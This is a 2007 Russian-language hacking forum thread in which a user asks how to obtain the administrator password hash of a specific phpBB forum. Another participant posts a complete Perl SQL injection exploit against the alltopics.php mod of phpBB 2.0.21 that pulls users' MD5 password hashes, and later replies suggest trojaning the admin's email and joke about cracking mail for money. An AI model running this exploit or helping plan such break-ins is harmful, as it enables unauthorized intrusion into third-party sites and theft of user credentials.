Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Powered by phpBB and NoseBleed v1.12 (https://forum.antichat.xyz/showthread.php?t=40992)

Petr 27.05.2007 18:00

Powered by phpBB and NoseBleed v1.12
 
Поиск по запросу NoseBleed вообще нечиго не выдает.
Версию с помощью docs/CHANGELOG.html не получилось узнать. пишет
Код:

Forbidden
You don't have permission to access /docs/CHANGELOG.html on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Форум адреса таким образом расположен
http://forum.*****.ru
Это что-то меняет?
и какие уязвимости есть у этого движка? мне бы хеш админский достать.

Morfusha 28.05.2007 14:31

1. http://forum.*****.ru это ничего не меняет
2. Для phpbb 2.0.21 в пабилке сплойтов нету

Petr 28.05.2007 18:04

Powered by phpBB and NoseBleed v1.12 - это разве 2.0.21 ?

Scipio 28.05.2007 18:30

Цитата:

Сообщение от Sandjuro
Powered by phpBB and NoseBleed v1.12 - это разве 2.0.21 ?


The original NoseBleed v1.12 skin for phpBB version 2+
Created by Mike Lothar (c) 2004 - 2005
http://www.mikelothar.com
Do not remove this copyright note

REDsaratov 04.06.2007 15:51

Попробуй этот
Цитата:

ђЇ†man.inc.
23.08.2006, 21:07
#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++
+ +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Mod:http:"//"www".phpbbhacks.com/download/2821 +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}

Basurman 06.06.2007 01:09

Блин. сплоит выше это сплоит на оч редкий мод.
Есть 2 варианта:
1. Достать админ пароль
2. Троянить почту, тем более что ты почту ломаешь мегаацки и за деньги :D :rolleyes:

Если админ стер /docs/CHANGELOG.html, то это уже что-то значит...

Basurman 09.06.2007 22:58

Кстати, еще инфа к размышлению:

http://www.securitylab.ru/vulnerability/281494.php

Исправлена в 2.0.22


Время: 22:26